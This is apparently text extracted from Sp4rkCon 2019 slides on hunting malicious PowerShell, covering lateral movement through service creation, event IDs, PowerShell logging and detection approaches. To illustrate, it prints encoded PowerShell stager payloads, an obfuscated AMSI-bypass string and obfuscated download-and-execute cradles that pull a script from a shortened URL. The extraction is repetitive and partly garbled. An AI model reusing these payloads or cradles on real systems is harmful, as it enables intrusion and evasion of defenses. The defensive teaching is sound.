gANgBMAE8AVwBjAFEASwBmAFMATABXAHQARgBwAE0AWgBsAFoATQAxAFoAMgBTAEMAYgBaAHQAVABJAGQARAA
zAHoARQBrAGYAYwA3AHgAQwArAG0AbQBJACsAVwBUAEYANwBNAEMAagBXAFIAUgAvAEsARQBGAHEAQgA1AHcA
YQBKAHkAZQBaAGsAMwBnAHIAOABBAFYAMgA2AE0AVABIADAAZwAzAHAAWgBFAFgAbABuAE4AawBDAEwAdABKA
EgANQBmAFcANgB4AGwAYgBZADkAYwBlAGYAUABsAFUARAB6AHEAawB2AGsAKwA5ADgAawA4AHEAeQBFAEgAUQ
AxADkAVgB3AHEAZABBAFAAOQBRAEkAOQB6AHkAbQBuAHUAWgByAHEAZwBSAEsATAB2ADYASABTAFMAYgAzAHA
AcwBpAHIAMgA5AFcARgBUAEYAWgBBADQAQgBsAFgAMQBiAG4AWABVAFkAdwBTAHEAQwB2AEwAWAAyAFgASwBs
AHIAMwA3ADUAcAB4AGkAaAAzAE4AcwA3AFgA <REDACTED> SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZ
QBjAHQAIABJAE8ALgBTAHQAcgBlAGEAbQBSAGUAYQBkAGUAcgAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABJAE
8ALgBDAG8AbQBwAHIAZQBzAHMAaQBvAG4ALgBHAHoAaQBwAFMAdAByAGUAYQBtACgAJABzACwAWwBJAE8ALgB
DAG8AbQBwAHIAZQBzAHMAaQBvAG4ALgBDAG8AbQBwAHIAZQBzAHMAaQBvAG4ATQBvAGQAZQBdADoAOgBEAGUA
YwBvAG0AcAByAGUAcwBzACkAKQApAC4AUgBlAGEAZABUAG8ARQBuAGQAKAApADsA
Sp4rkCon 2019

%COMSPEC% /b /c start /b /min powershell -nop -w hidden -encodedcommand
JABzAD0ATgBlAHcALQBPAGIAagBlAGMAdAAgAEkATwAuAE0AZQBtAG8AcgB5AFMAdAByAGUAYQBtACgALABbA
EMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACIASAA0AHMASQ
BBAEEAQQBBAEEAQQBBAEEAQQBLADEAVwBiAFgAUABhAE8AQgBEACsASABIADYARgBQAG0AVABHADkAaABRAG8
AQwBXAGsAYQBlAHAATwBaADgAbwA0ADUASQBDAFEAbQBDAFMAMQBsAEcAQwBIAEwAWQBEAEEAVwBTAEwATABC
AGEAZgB2AGYAYgAyAFYAagBTAGkALwBKAFgAVwBiAHUATQBzAE4ARQBsAG4AWgBYAHUAOAA4ACsAdQB5AHUAT
AB5AHAAdwBsAHUAVQB0AGsAbAA5AGsAVQA1AFIANABvAEYAeQA3AHoAMABYAGsAbQBjADEAcABqAHAAawBUAF
gANgBMAE8AVwBjAFEASwBmAFMATABXAHQARgBwAE0AWgBsAFoATQAxAFoAMgBTAEMAYgBaAHQAVABJAGQARAA
zAHoARQBrAGYAYwA3AHgAQwArAG0AbQBJACsAVwBUAEYANwBNAEMAagBXAFIAUgAvAEsARQBGAHEAQgA1AHcA
YQBKAHkAZQBaAGsAMwBnAHIAOABBAFYAMgA2AE0AVABIADAAZwAzAHAAWgBFAFgAbABuAE4AawBDAEwAdABKA
EgANQBmAFcANgB4AGwAYgBZADkAYwBlAGYAUABsAFUARAB6AHEAawB2AGsAKwA5ADgAawA4AHEAeQBFAEgAUQ
AxADkAVgB3AHEAZABBAFAAOQBRAEkAOQB6AHkAbQBuAHUAWgByAHEAZwBSAEsATAB2ADYASABTAFMAYgAzAHA
AcwBpAHIAMgA5AFcARgBUAEYAWgBBADQAQgBsAFgAMQBiAG4AWABVAFkAdwBTAHEAQwB2AEwAWAAyAFgASwBs
AHIAMwA3ADUAcAB4AGkAaAAzAE4AcwA3AFgA <REDACTED> SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZ
QBjAHQAIABJAE8ALgBTAHQAcgBlAGEAbQBSAGUAYQBkAGUAcgAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABJAE
8ALgBDAG8AbQBwAHIAZQBzAHMAaQBvAG4ALgBHAHoAaQBwAFMAdAByAGUAYQBtACgAJABzACwAWwBJAE8ALgB
DAG8AbQBwAHIAZQBzAHMAaQBvAG4ALgBDAG8AbQBwAHIAZQBzAHMAaQBvAG4ATQBvAGQAZQBdADoAOgBEAGUA
YwBvAG0AcAByAGUAcwBzACkAKQApAC4AUgBlAGEAZABUAG8ARQBuAGQAKAApADsA
Sp4rkCon 2019
1. Service creation for lateral movement
1. System event log EID 7045 (Service Creation)
1. 7045 does NOT record modification of existing services
2. HKLM:SYSTEMCurrentControlSetServices294364cImagePath
2. C:WindowsSystem32services.exe
à cmd.exe
à powershell.exe
3. %COMSPEC% /b /c start /b /min powershell
1. %COMSPEC% ß C:WINDOWSsystem32cmd.exe
2. start /b /min ß minimized launch related to service “timeout”
https://upload.wikimedia.org/wikipedia/en/thumb/9/97/Registry_Editor_icon.png/256px-Registry_Editor_icon.png

$s=New-Object IO.MemoryStream(,[Convert]::FromBase64String("H4sIAAAAAAAAAK1WbXPaOBD+H
H6FPmTG9hQoCWkaepOZ8o45ICQmCS1lGCHLYDAWSLLBafvfb2VjSi/JXWbuMsNElnZXu88+uyuLypwluUtkl9
kU5R4oFy7z0Xkmc1pjpkTX6LOWcQKfSLWtFpMZlZM1Z2SCbZtTIdD3zEkfc7xC+mmI+WTF7MCjWRR/KEFqB5w
aJyeZk3gr8AV26MTH0g3pZEXlnNkCLtJH5fW6xlbY9cefPlUDzqkvk+98k8qyEHQ19VwqdAP9QI9zymnuZrqg
RKLv6HSSb3psir29WFTFZA4BlX1bnXUYwSqCvLX2XKlr375pxih3Ns7XNwH2hK5ZkZB0lbc9TzPQT0NdOIjWV
Ne6LuFMMEfmH12/eJ6/j73vxc53E981Yx/ZbI0hjteDVFYTHV2DZR+wKScYalk0UveNxmP0+eDNXeBLd0Xzpi
8pZ2uL8tAlVORb2Lc9ekcdUNMEpM+faQY4wakMuI9SX0AvZEuqn/qB52XB7uitdsd6j25TcN+qpB8rgVRfciO
758Rb4OjGvEnMQTjPvD8ilwF/zwhmZH5mXqCqTT06w5JOJOB7xNXMyckoXlKIR+8z4cZ616iQRV1wAkvGI5XO
AQ+oMf6Vn+TaVFNkXzV0lmrtdZL0JH5co9EDc+1x5sTI7Nmj9ifTwPVsytX569VQo47r01rk45VLUsLrL+WMO
h6N8cinYj3wU9f2B9Su7dHRFKCj52r1lSsPupXEuTKBvAvwCihh/O5MkkNdM/0uXQF+yTfQ9NSBMqOp9L60ov
R29a24XPWwEFnUD6DOSRZZFHvUzqKyL9z9UTmQLF5qv9ztBp50CRYyNTc2XoB0f3WV+VAxAYHsAgwDa02Jiz2
FSha1XJtWIsudpS5oL2JSxZ4HJQeWQsgJ7CgsLKk4w+3s3/lh5C0qzdXaoyuQjrtQw8Mz6Dn7iorphmfU1v7B
7bROkqJQWKUgHTkNBLA8JrPoweUS+pqWfUa8/+be7y3mNzernO4TqceFOKpEUpVLLEnUcLk+YBkjxyWg1uBsV
cGCXl5YcRvTteJVsDGj7uL2kjfrYaO1adUH8AvhV9w06p1O+25dueuQenDTbxXajnl7VbsItoEZDCqFYqMAck
+bZt0xwxv25SxYXZzZazPswZ74uGmJmhnWyq <REDACTED> cd7Qv3CV6RdIOuYu4JibnMLdgUnpxxD9V
PsYHM+hCdYvQT5SC8siiew7uTzwLVUFHyjP6BtthNFH+gO0ooPINybTYFllKYi8p0bEQJw95ftJ31sZcLAAA=
"));IEX (New-Object IO.StreamReader(New-Object IO.Compression.GzipStream($s,[IO.Compr
ession.CompressionMode]::Decompress))).ReadToEnd();
Sp4rkCon 2019

Sp4rkCon 2019
1. Base64 decode

Sp4rkCon 2019
1. Base64 decode
2. Stream instantiation

Sp4rkCon 2019
1. Base64 decode
3. GZIP decompression

Sp4rkCon 2019
1. Base64 decode
3. GZIP decompression
4. IEX invocation

Set-StrictMode -Version 2
$DoIt = @'
function func_get_proc_address {<REDACTED>}
function func_get_delegate_type {<REDACTED>}
[Byte[]]$var_code = [System.Convert]::FromBase64String('38uq...')
<REDACTED>
'@
If ([IntPtr]::size -eq 8) {
start-job { param($a) IEX $a } -RunAs32 -Argument $DoIt | wait-job | Receive-Job
}
else {
IEX $DoIt
}
Sp4rkCon 2019
64-bit
32-bit
https://csnh.com/wp-content/uploads/2018/03/Shell.png https://www.toyotaliftnorthwest.com/ecom_img/original-29-84-ecb25-2.png

Sp4rkCon 2019
https://i.gifer.com/embedded/download/FVao.gif https://csnh.com/wp-content/uploads/2018/03/Shell.png https://www.toyotaliftnorthwest.com/ecom_img/original-29-84-ecb25-2.png
$DoIt
$DoIt
$DoIt

# Forensic Artifacts
• Event logs
• Process creation (Security EID 4688 & Sysmon EID 1)
• Service creation (System 7045)
• ALL POWERSHELL LOGS J
• Registry hives
• Services
• Run keys
• Other persistence locations
• WMI repository
• Startup folder
https://www.brafton.com/wp-content/uploads/2019/01/searching.gif
Sp4rkCon 2019

# Detection Approaches
• Parent/Child process relationships
• powershell.exe/pwsh.exe
launched by:
Sp4rkCon 2019
Productivity Apps Email Apps Web Browsers
winword.exe
excel.exe
powerpnt.exe
onenote.exe
access.exe
visio.exe
mspub.exe
acrord32.exe
outlook.exe
thunderbird.exe
iexplore.exe
MicrosoftEdgeCP.exe
firefox.exe
chrome.exe
opera.exe
Web Server Database Middleware
httpd.exe
w3wp.exe
etc.
sqlservr.exe
etc.
ColdFusion.exe
WebLogic
etc.

# Detection Approaches
• Searching for PowerShell syntax anywhere you can think of
• Registry (services, Run, RunOnce, COM hijacking, etc.)
• YARA rules on file contents on disk (.ps1, .psm1, .bat, .txt)
• Scheduled tasks
• WMI repositories
• All event logs
• Inbound documents, attachments
• Downloaded content (Snort & YARA rules in common download folders)
• SMB file transfers (PS scripts, scheduled task XML files, A/V or SCCM jobs, etc.)
https://www.brafton.com/wp-content/uploads/2019/01/searching.gif
Sp4rkCon 2019

Get-WinEvent -ListLog ‘*PowerShell*’
• Logging visibility
http://quentindouris.fr/images/accueil/image_sisr/powershell.png http://akorndmc.com/media/2305/wadi-rum.jpg http://www.nwclimate.org/wp-content/uploads/2015/03/amazon-forest-carbon-dioxide.jpg
Sp4rkCon 2019

Get-WinEvent -ListLog ‘*PowerShell*’
• Logging visibility in PowerShell 3.0+ WARNING: don’t freak out!
https://media1.tenor.com/images/673b069bcb3c0c7496e18c0a8b93aa86/tenor.gif?itemid=3953184
Sp4rkCon 2019

about_HotFirePowerShellLogging
• PowerShell logging
• Module
• ScriptBlock
• Transcription
Sp4rkCon 2019

• Module
• ScriptBlock
• Transcription (over the shoulder)
Sp4rkCon 2019
https://www.thewrap.com/wp-content/uploads/2018/03/luke-yoda-dagobah-weird-al.jpg

• Module
• ScriptBlock
Sp4rkCon 2019

• Module
• Script Block
Sp4rkCon 2019
**********************
Windows PowerShell transcript start
Start time: 20190416091709
Username: DESKTOP-DEMOme
RunAs User: DESKTOP-DEMOme
Configuration Name:
Machine: DESKTOP-DEMO (Microsoft Windows NT 10.0.17134.0)
Host Application: C:WindowsSystem32WindowsPowerShellv1.0powershell.exe
Process ID: 11372
PSVersion: 5.1.17134.590
PSEdition: Desktop
PSCompatibleVersions: 1.0, 2.0, 3.0, 4.0, 5.0, 5.1.17134.590
BuildVersion: 10.0.17134.590
CLRVersion: 4.0.30319.42000
WSManStackVersion: 3.0
PSRemotingProtocolVersion: 2.3
SerializationVersion: 1.1.0.1
**********************
Transcription

• Module
• Script Block
Sp4rkCon 2019
**********************
Command start time: 20190416091723
**********************
PS C:> Get-Command *yoda*
**********************
**********************
PS C:> Invoke-Yoda
**********************
**********************
PS>CommandInvocation(Out-String): "Out-String"
>> ParameterBinding(Out-String): name="InputObject"; value="The term 'Invoke-Yoda' is not recognized as the name of a cmdlet, function, script file, or operable
program. Check the spelling of the name, or if a path was included, verify that the path is correct and try again."
Invoke-Yoda : The term 'Invoke-Yoda' is not recognized as the name of a cmdlet, function, script file, or operable program. Check the spelling of the name, or if a
path was included, verify that the path is correct and try again.
At line:1 char:1
+ Invoke-Yoda
+ ~~~~~~~~~~~
+ CategoryInfo : ObjectNotFound: (Invoke-Yoda:String) [], CommandNotFoundException
+ FullyQualifiedErrorId : CommandNotFoundException
Invoke-Yoda : The term 'Invoke-Yoda' is not recognized as the name of a cmdlet, function, script file, or operable program. Check the spelling of the name, or if a path was included, verify that the path is correct
and try again.
At line:1 char:1
Transcription

• Module
• Script Block
• Transcription
Sp4rkCon 2019

$payload.Layers.Count++
• Module
• ScriptBlock
• Transcription
Sp4rkCon 2019
https://media1.giphy.com/media/3o7TKLlrPQJNLeYjo4/giphy.gif
while ($payload.NextLayer)
{
$payload = $payload.NextLayer
}
Invoke-Expression $payload

• Module
• ScriptBlock
• Transcription
Sp4rkCon 2019
http://media3.giphy.com/media/3oz8xY7LU16LHkfqLe/giphy.gif https://media1.giphy.com/media/3o7TKLlrPQJNLeYjo4/giphy.gif

Sp4rkCon 2019
$s = New-Object
IO.Compression.DeflateStream([IO.MemoryStream][Convert]::FromBase64String('dZDBboM
wEER/xRJINkowQVUvcVL1P9oejFmCA9jUXkIixL93S3PtbXdG80a7zeQMWu/YKQnQg46QvLFrRPERMVh3+
WLpNmRLWvlYnkuF4bEw4WDOfXUFgyw+IsIgHaCcoTK9BYeEg7sdiJXJ2s+u97pubA/ij7ZPwd2OlBp3/BO
H8bV8OUi4A8/UajSa9tl2UGsAnIJj267WdKjK87vgOuAcOmm8nLoignTE5nt+AcybieThKRKw8QG0aZlIK
4uaWWIRJFtsI37v5C3ieCwKvtv8jOXwzciuKNWpla3qlNx0b2uN9JqI1JyPwRuIkZD/nvED'),[IO.Comp
ression.CompressionMode]::Decompress);IEX (New-Object
System.IO.StreamReader($s,[System.Text.Encoding]::ASCII)).ReadToEnd()
powershell.exe iex $env:gkwa
sV s3zxl5 ( [typE]( "{1}{0}{2}" -f'ViRO','en','NmeNt') ) ; ( ( VARIaBle S3ZXl5 -Va
)::( "{1}{0}{3}{4}{2}"-f 'V','geten','e','iRONmeNTv','ARIAbL' ).Invoke( 'gkwa',(

Sp4rkCon 2019
$s = New-Object
,83 ,101,114 ,118, 105, 99 ,101, 80, 111,105 , 110,116 ,77 ,97, 110 , 97, 103 , 101
, 114 ,93,58,58,83, 101 ,114 ,118 ,101 , 114 ,67,101 ,114 , 116 ,105 ,102 ,105 ,99 ,
97 , 116,101, 86 ,97 , 108 ,105,100,97 , 116 , 105, 111 ,110 ,67, 97 ,108,108 ,98 ,
97 ,99 ,107, 32 , 61 ,32 , 123 ,36 ,116,114 ,117 , 101 ,125 , 10 , 116,114 , 121 ,
123,10,91, 82 ,101 ,102 ,93 , 46, 65,115 ,115 ,101, 109,98, 108, 121 , 46,71 ,
101,116 ,84 ,121,112 ,101 , 40, 39 ,83, 121 ,115, 39, 43, 39,116,101 , 109, 46,77,
97 ,110 , 39, 43,39,97, 103 ,101, 109,101 , 110, 116, 46,65,117,116 ,39,43 , 39
,111, 109,97 , 116 ,105 ,111 , 110 ,46,65 , 109 , 39 , 43 ,39,115, 105 ,85 ,116 ,
39, 43, 39 , 105 ,108, 115 , 39 , 41 , 46, 71, 101, 116, 70, 105 , 101,108 ,100 , 40
, 39 ,97 , 109 ,39,43 , 39,115, 105, 73,110,105 ,39 ,43, 39, 116,70 , 97 ,105 , 108
,101,100 ,39, 44 ,32 , 39,78,111,110, <REDACTED> , 98 ,121,116 , 101 ,115,
44,32,48 ,44,32 ,36 ,98,121 , 116,101,115 ,46,76 , 101,110 ,103,116 , 104,41
,10,36,114, 101, 113, 117 ,101,115, 116 ,83,116, 114, 101 , 97,109 , 46 ,67,108,111
, 115 ,101, 40 ,41 , 10 , 36 , 114,101 , 113,117 , 101,115, 116 ,46 ,71 ,
101,116,82,101,115, 112, 111 ,110 ,115, 101,40,41)) )

Sp4rkCon 2019
$s = New-Object
,83 ,101,114 ,118, 105, 99 ,101, 80, 111,105 , 110,116 ,77 ,97, 110 , 97, 103 , 101
, 114 ,93,58,58,83, 101 ,114 ,118 ,101 , 114 ,67,101 ,114 , 116 ,105 ,102 ,105 ,99 ,
97 , 116,101, 86 ,97 , 108 ,105,100,97 , 116 , 105, 111 ,110 ,67, 97 ,108,108 ,98 ,
97 ,99 ,107, 32 , 61 ,32 , 123 ,36 ,116,114 ,117 , 101 ,125 , 10 , 116,114 , 121 ,
123,10,91, 82 ,101 ,102 ,93 , 46, 65,115 ,115 ,101, 109,98, 108, 121 , 46,71 ,
101,116 ,84 ,121,112 ,101 , 40, 39 ,83, 121 ,115, 39, 43, 39,116,101 , 109, 46,77,
97 ,110 , 39, 43,39,97, 103 ,101, 109,101 , 110, 116, 46,65,117,116 ,39,43 , 39
,111, 109,97 , 116 ,105 ,111 , 110 ,46,65 , 109 , 39 , 43 ,39,115, 105 ,85 ,116 ,
39, 43, 39 , 105 ,108, 115 , 39 , 41 , 46, 71, 101, 116, 70, 105 , 101,108 ,100 , 40
, 39 ,97 , 109 ,39,43 , 39,115, 105, 73,110,105 ,39 ,43, 39, 116,70 , 97 ,105 , 108
,101,100 ,39, 44 ,32 , 39,78,111,110, <REDACTED> , 98 ,121,116 , 101 ,115,
44,32,48 ,44,32 ,36 ,98,121 , 116,101,115 ,46,76 , 101,110 ,103,116 , 104,41
,10,36,114, 101, 113, 117 ,101,115, 116 ,83,116, 114, 101 , 97,109 , 46 ,67,108,111
, 115 ,101, 40 ,41 , 10 , 36 , 114,101 , 113,117 , 101,115, 116 ,46 ,71 ,
101,116,82,101,115, 112, 111 ,110 ,115, 101,40,41)) )
]}};
$t='/news.php';
$Iv=$DATA[0..3];
-jOin[ChAr[]](& $R $DaTA ($IV+$K))|IEX https://thumbs.gfycat.com/NeatDismalHoki-size_restricted.gif

Get-Help Invoke-Yoda -Example
Sp4rkCon 2019
https://pastebin.com/raw/770i3PRz ß https://bit.ly/invoke-yoda

Sp4rkCon 2019
https://pastebin.com/raw/770i3PRz ß https://bit.ly/invoke-yoda
https://media1.tenor.com/images/d1b7019245856b67ac465230d8b5b928/tenor.gif?itemid=9602869

Sp4rkCon 2019
https://media.giphy.com/media/dTGeSnz0FzufK/giphy.gif

Get-History | ? { $_.CommandLine -match 'Invoke-Yoda' }
Sp4rkCon 2019
ls sl*;SI Variable:XQ (.(Get-Variable E*ext).Value.InvokeCommand.(((Get-Variable
E*ext).Value.InvokeCommand|Get-Member|?{$_.Name-clike'*dl*ts'}).Name).Invoke(
'Ne*ct')Net.WebClient);SI Variable:P08 'https://bit.ly/invoke-yoda';&(((Get-
Variable E*ext).Value.InvokeCommand|%{(Get-Variable _ -Val).(((Get-Variable
E*ext).Value.InvokeCommand|Get-Member|?{$_.Name-clike'*w*o*k'}).Name).Invoke((
Variable XQ -Va).((((Variable XQ -Va)|Get-Member)|?{$_.Name-clike'*nl*g'}).Name
).Invoke((Variable P08 -ValueOn))+';Invoke-Yoda')}))
Invoke-CradleCrafter

Sp4rkCon 2019
Invoke-Obfuscation
.('ls') ("{1}{0}"-f 'l*','s');&('SI') (("{2}{1}{0}"-f 'aXQ','Im','Variable:'))."rE`p`LACe"((
[chAR]73+[chAR]109+[chAR]97),'') (.(&("{0}{1}{3}{2}" -f'Ge','t-V','le','ariab') ("{1}{0}" -
f'*ext','E'))."VÀLUe"."I`NVòKE`CO`mmANd".(((.("{0}{3}{2}{1}"-f'Get-','able','i','Var')
("{0}{1}"-f'E*ex','t'))."VA`LUE"."iNvoKÈCo`mMaND"|.("{0}{1}{2}" -f 'Get-M','emb','er')|&('?')
{${_}."NA`mE"-clike("{0}{1}"-f '*dl*t','s')})."Na`Me")."i`N`VOKE"(("{1}{0}" -f '*ct','Ne’))
("{3}{1}{0}{2}"-f'lien','WebC','t','Net.'));.('SI') ((("{3}{2}{0}{1}"-f 'l','e:Dm9P08','ariab',
'V')) -REPlAcE 'Dm9',[chAr]92) ("{1}{0}{4}{2}{3}" -f '.','https://bit','nvoke-','yoda','ly/i');
&(((.("{2}{3}{0}{1}" -f 'r','iable','Get-V','a') ("{1}{0}"-f 'ext','E*’)
)."vA`LUE"."i`NVOke`CO`m`MAnd"|.('%'){(.("{1}{2}{0}"-f 'riable','G','et-Va') ('_') -Val).(((
&("{1}{0}{2}" -f'Var','Get-','iable') ("{0}{1}"-f 'E*ex','t'))."VÀLUe"."iNvòke`CommaND"|
&("{2}{0}{3}{1}"-f '-Me','er','Get','mb')|&('?'){${_}."NA`me"-clike("{0}{2}{1}"-f
'*w*','k','o*')})."nÀMe")."i`NVOKe"((&("{0}{1}"-f 'Varia','ble') ('XQ') -Va).((((&("{2}{1}{0}"-
f 'iable','ar','V') ('XQ') -Va)|.("{2}{1}{0}" -f't-Member','e','G'))|.('?'){${_}."NÀmE"-
clike("{1}{0}"-f'l*g','*n')})."nÀme")."I`NVOkE"((.("{2}{0}{1}" -f'riab','le','Va') ("{1}{0}"-
f'08','P') -ValueOn))+("{1}{0}{2}"-f 'oke-Yod',';Inv','a'))}))

Sp4rkCon 2019
Invoke-Obfuscation
.('ls') ("{1}{0}"-f 'l*','s');&('SI') (("{2}{1}{0}"-f 'aXQ','Im','Variable:'))."rE`p`LACe"((
[chAR]73+[chAR]109+[chAR]97),'') (.(&("{0}{1}{3}{2}" -f'Ge','t-V','le','ariab') ("{1}{0}" -
f'*ext','E'))."VÀLUe"."I`NVòKE`CO`mmANd".(((.("{0}{3}{2}{1}"-f'Get-','able','i','Var')
("{0}{1}"-f'E*ex','t'))."VA`LUE"."iNvoKÈCo`mMaND"|.("{0}{1}{2}" -f 'Get-M','emb','er')|&('?')
{${_}."NA`mE"-clike("{0}{1}"-f '*dl*t','s')})."Na`Me")."i`N`VOKE"(("{1}{0}" -f '*ct','Ne’))
("{3}{1}{0}{2}"-f'lien','WebC','t','Net.'));.('SI') ((("{3}{2}{0}{1}"-f 'l','e:Dm9P08','ariab',
'V')) -REPlAcE 'Dm9',[chAr]92) ("{1}{0}{4}{2}{3}" -f '.','https://bit','nvoke-','yoda','ly/i');
&(((.("{2}{3}{0}{1}" -f 'r','iable','Get-V','a') ("{1}{0}"-f 'ext','E*’)
)."vA`LUE"."i`NVOke`CO`m`MAnd"|.('%'){(.("{1}{2}{0}"-f 'riable','G','et-Va') ('_') -Val).(((
&("{1}{0}{2}" -f'Var','Get-','iable') ("{0}{1}"-f 'E*ex','t'))."VÀLUe"."iNvòke`CommaND"|
&("{2}{0}{3}{1}"-f '-Me','er','Get','mb')|&('?'){${_}."NA`me"-clike("{0}{2}{1}"-f
'*w*','k','o*')})."nÀMe")."i`NVOKe"((&("{0}{1}"-f 'Varia','ble') ('XQ') -Va).((((&("{2}{1}{0}"-
f 'iable','ar','V') ('XQ') -Va)|.("{2}{1}{0}" -f't-Member','e','G'))|.('?'){${_}."NÀmE"-
clike("{1}{0}"-f'l*g','*n')})."nÀme")."I`NVOkE"((.("{2}{0}{1}" -f'riab','le','Va') ("{1}{0}"-
f'08','P') -ValueOn))+("{1}{0}{2}"-f 'oke-Yod',';Inv','a'))}))
Invoke-Obfuscation
& ( ''.ReMOVE.tOstRInG()[30,54,69]-JOIn'')( "$(sEt-iteM 'VAriable:ofS' '') " + [StRinG]('2es28o27,6ch73{27_29h20h28-
22h7bx31,7d{7b_30o7d{22h2dx66_20x27s6ch2a_27{2c,27h73_27_29-3b-26{28{27h53_49o27s29h20,28s28o22-7b{32x7ds7bs31s7do7b{30h7ds22{2d{66h20-
27,61,58s51h27_2ch27_49-6do27,2ch27o56o61{72h69o61{62{6c{65x3as27,29{29{2e{22x72_45h60,70s60{4c,41x43-65,22h28s28o5b,63,68h41x52,5dh37-
33s2bx5bh63s68_41x52-5ds31o30s39o2bs5b-63-68s41o52,5d_39s37{29_2c{27{5cx27_29h20x28_2e{28_26{28h22{7bo30_7ds7bs31s7do7b-
33_7dh7bh32{7dx22_20h2dh66_27,47{65-27s2ch27_74x2d,56-27h2co27-6c_65,27-2cs27-61,72s69h61-62o27h29,20o28x22-
7bh31_7d_7b{30,7dh22_20s2d{66_27s2ax65,78x74_27,2cs27{45x27s29-29h2e-
22s56,60x41s4c_55o65,22{2e{22h49_60o4e_56x60x6fs4bs45x60{43o4f_60{6d_6dh41s4e-64-22s2e,28-28x28s2ex28o22s7bo30-
7dh7b,33s7dh7b{32x7dh7bo31_7dh22x2d,66o27o47{65,74{2d_27x2cx27{61x62s6c_65_27o2ch27h69,27h2cs27s56_61,72x27s29h20-28x22-7b-
30s7d_7b{31o7d{22{2do66h27x45{2as65_78,27h2c,27-74s27x29_29_2eh22-56,41_60,4c_55x45x22_2eh22{69{4e_76,6f_4bx60s45-43-6f-60,6d{4dh61-4e-
44_22o7co2ex28o22s7bs30{7ds7bx31-7d_7bx32-7do22-20s2d-66,20-27h47h65s74_2dx4d{27s2ch27_65s6d-
62h27_2cs27,65{72o27_29o7co26o28o27o3fx27{29_7b,24o7b{5fx7do2e,22_4eh41_60,6ds45x22-2do63,6c-69h6bh65_28o22{7b,30-
7dh7bx31x7d,22h2dx66x20_27s2a_64h6c_2as74s27s2c_27{73,27h29-7do29-2e-22h4e,61s60{4d,65x22{29{2e{22x69,60s4ex60{56-4f,4b{45_22o28x28-22,7b-
31{7dx7bo30o7d{22-20,2dx66-20-27s2ao63s74x27x2c,27h4e,65x27{29x29o28,22{7b,33,7do7b-31_7d,7b{30o7dh7b,32o7d_22s2d,66x27x6c_69s65h6e-
27{2c{27x57x65_62-43s27_2c{27_74{27,2cs27-4eo65-74_2e-27_29s29{3b-2eh28{27s53s49x27x29x20,28s28x28o22{7b-33,7d_7bx32h7d-7b,30{7d-
7b_31,7do22_2do66{20x27_6cx27s2c_27h65h3a,44-6d-39s50h30h38,27s2c,27x61h72{69o61{62o27x2co27-56s27_29_29,20_2d-
52x45h50o6cs41x63,45_20h20{27x44,6ds39,27-2co5b,63{68_41x72{5dx39_32,29h20_28_22o7b,31_7d-7b,30_7do7b{34o7d{7b_32_7d{7b_33s7d_22s20_2d-66-
20s27,2es27o2c-27o68{74_74-70_73o3a-2f,2f_62,69{74x27s2ch27{6e{76o6f{6bo65{2dx27_2co27h79{6fx64_61s27o2c-27o6ch79h2fh69x27,29-3bs26-
28s28_28_2e_28s22{7bs32x7d{7b{33_7do7b,30s7d,7bs31{7ds22s20s2do66h20_27,72s27s2c_27{69-
61h62{6cs65x27x2c{27o47,65h74{2dh56h27h2c,27h61_27h29o20h28s22x7b-31h7d-7b-30s7d-22h2do66s20,27,65x78o74{27h2co27x45o2ah27{29-
29{2e{22s76_41_60_4cx55,45x22,2e-22s69o60o4e{56o4fs6bx65o60_43{4f_60{6d,60s4dh41h6eh64-22h7c,2e-28o27x25h27{29x7bh28o2e_28h22_7b_31o7d-
7bs32s7dh7bh30s7d-22s2dh66-20_27-72-69{61-62s6co65,27,2co27h47h27h2c-27_65s74h2d-56-
61h27,29x20s28h27o5f{27{29o20h2d,56h61{6cx29h2ex28o28s28h26s28{22h7b{31x7d{7bx30o7d-7bo32s7do22{20-
2ds66x27s56h61s72o27x2c,27h47{65s74o2d{27{2cx27s69_61,62s6c_65h27{29{20,28h22{7b_30s7do7b_31_7do22_2dx66h20h27,45h2a_65_78,27{2c-27h74-
27o29h29x2ex22x56_60_41{4ch55,65s22h2e{22-69,4es76,60,6f{6bx65s60-43{6fs6dx6d,61,4e_44-22x7co26x28-22s7b{32o7dh7bh30s7d-7b,33s7d-
7b,31o7ds22h2d{66s20x27o2dx4d{65x27o2ch27h65_72,27{2co27,47h65,74{27,2c_27,6dh62h27-29s7c_26o28h27{3fs27s29h7bh24{7bo5f-
7ds2e_22_4eh41x60x6dx65,22h2d,63s6co69h6b{65_28s22x7bo30x7do7b_32-7d,7bs31o7ds22o2d_66x20h27o2as77_2a-27h2co27-
6bh27,2cx27s6fs2ax27,29s7dh29x2eo22x6eo60h41,4dx65{22h29{2e,22h69,60,4ex56,4fh4bx65o22o28,28o26,28-22_7bs30-7d_7bx31-7d{22o2d-66{20s27_56-
61h72o69{61,27{2c{27h62,6ch65o27-29,20-28-27_58h51h27-29,20s2d-56s61,29-2ex28_28x28-
28s26,28o22_7bh32h7do7b_31s7d_7bo30s7d,22,2ds66s20h27x69,61_62-6co65,27_2cx27,61-72{27_2cs27_56-27h29s20-28{27x58-51s27-29-20,2dh56s61h29-
